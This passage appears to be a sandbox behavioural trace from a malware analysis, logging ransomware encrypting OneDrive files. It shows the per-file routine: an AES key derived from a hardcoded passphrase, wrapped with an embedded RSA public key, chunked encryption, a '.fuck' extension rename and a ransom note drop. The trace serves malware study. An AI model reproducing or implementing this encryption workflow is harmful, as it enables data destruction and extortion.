dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2cfa0) returned 1 [0277.979] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2cfa0, dwCertEncodingType=0x1, pInfo=0x2f36530*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36560*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36568*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbe88) returned 1 [0277.979] CryptEncrypt (in: hKey=0x2fbe88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0277.979] CryptEncrypt (in: hKey=0x2fbe88, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2db50*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2db50*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0277.979] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2db50*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2db50*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0277.980] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.992] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.992] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.996] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.997] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.997] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0277.997] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0277.998] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5ddc8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesRead=0x2b9ce68*=0x147, lpOverlapped=0x0) returned 1 [0277.998] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x147, dwBufLen=0x400 | out: pbData=0x2f5ddc8*, pdwDataLen=0x2b9ce68*=0x150) returned 1 [0277.998] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5ddc8*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ddc8*, lpNumberOfBytesWritten=0x2b9ce68*=0x150, lpOverlapped=0x0) returned 1 [0277.998] CloseHandle (hObject=0x5d48) returned 1 [0277.998] CloseHandle (hObject=0x5d3c) returned 1 [0277.998] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg"), bFailIfExists=0) returned 1 [0278.001] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg", dwFileAttributes=0x0) returned 1 [0278.002] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg.gsg")) returned 1 [0278.003] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\stackedIceCubes.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\stackedicecubes.svg.fuck")) returned 1 [0278.005] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0278.005] CryptDestroyKey (hKey=0x2fb688) returned 1 [0278.005] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0278.005] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.005] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0278.005] GetLastError () returned 0x0 [0278.005] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg")) returned 0x20 [0278.005] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg", dwFileAttributes=0x80) returned 1 [0278.006] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0278.007] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0278.008] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg.gsg", dwFileAttributes=0x2) returned 1 [0278.008] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f24b58) returned 1 [0278.011] CryptCreateHash (in: hProv=0x2f24b58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0278.011] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0278.011] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0278.011] CryptDeriveKey (in: hProv=0x2f24b58, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0278.011] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0278.011] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0278.011] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2d8a8) returned 1 [0278.012] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2d8a8, dwCertEncodingType=0x1, pInfo=0x2f37230*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37260*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37268*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc088) returned 1 [0278.012] CryptEncrypt (in: hKey=0x2fc088, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0278.012] CryptEncrypt (in: hKey=0x2fc088, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d578*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d578*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0278.012] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f2d578*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2d578*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0278.013] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.025] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.025] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.027] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.027] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.027] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.028] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5ede8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesRead=0x2b9ce68*=0x2d, lpOverlapped=0x0) returned 1 [0278.028] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x2d, dwBufLen=0x400 | out: pbData=0x2f5ede8*, pdwDataLen=0x2b9ce68*=0x30) returned 1 [0278.028] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5ede8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5ede8*, lpNumberOfBytesWritten=0x2b9ce68*=0x30, lpOverlapped=0x0) returned 1 [0278.028] CloseHandle (hObject=0x5d3c) returned 1 [0278.028] CloseHandle (hObject=0x5d48) returned 1 [0278.028] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg"), bFailIfExists=0) returned 1 [0278.031] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg", dwFileAttributes=0x0) returned 1 [0278.032] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg.gsg")) returned 1 [0278.033] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\waterGlass.svg.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\waterglass.svg.fuck")) returned 1 [0278.035] CryptDestroyHash (hHash=0x2fa6c8) returned 1 [0278.035] CryptDestroyKey (hKey=0x2fb688) returned 1 [0278.035] CryptReleaseContext (hProv=0x2f24b58, dwFlags=0x0) returned 1 [0278.035] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0278.035] FindClose (in: hFindFile=0x2fa4c8 | out: hFindFile=0x2fa4c8) returned 1 [0278.035] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\readme_back_files.htm")) returned 0xffffffff [0278.035] AreFileApisANSI () returned 1 [0278.035] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0278.035] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\images\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\images\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0278.036] GetFileType (hFile=0x5d4c) returned 0x1 [0278.036] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0278.038] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0278.038] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0278.038] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.038] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0278.038] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0278.039] GetLastError () returned 0x0 [0278.039] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui")) returned 0x20 [0278.039] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0278.039] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d48 [0278.040] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\is\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0278.042] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\is\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0278.042] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f2d9b8) returned 1 [0278.045] CryptCreateHash (in: hProv=0x2f2d9b8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0278.045] lstrlenA (lpString="mFAiKoqVtEXtrqexmwxcuDQAzMlQm") returned 29 [0278.045] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb490, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0278.045] CryptDeriveKey (in: hProv=0x2f2d9b8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fb688) returned 1 [0278.045] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0278.045] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0278.045] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f2df90) returned 1 [0278.045] CryptImportPublicKeyInfo (in: hCryptProv=0x2f2df90, dwCertEncodingType=0x1, pInfo=0x2f36600*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f36630*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f36638*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fbc48) returned 1 [0278.045] CryptEncrypt (in: hKey=0x2fbc48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0278.046] CryptEncrypt (in: hKey=0x2fbc48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f2d710*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f2d710*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0278.046] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f2d710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f2d710*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0278.047] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.065] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.065] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.067] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.067] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e9e0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.067] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5e9e0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e9e0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.068] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5e9e0, nNumberOfBytesToRead=0x380, 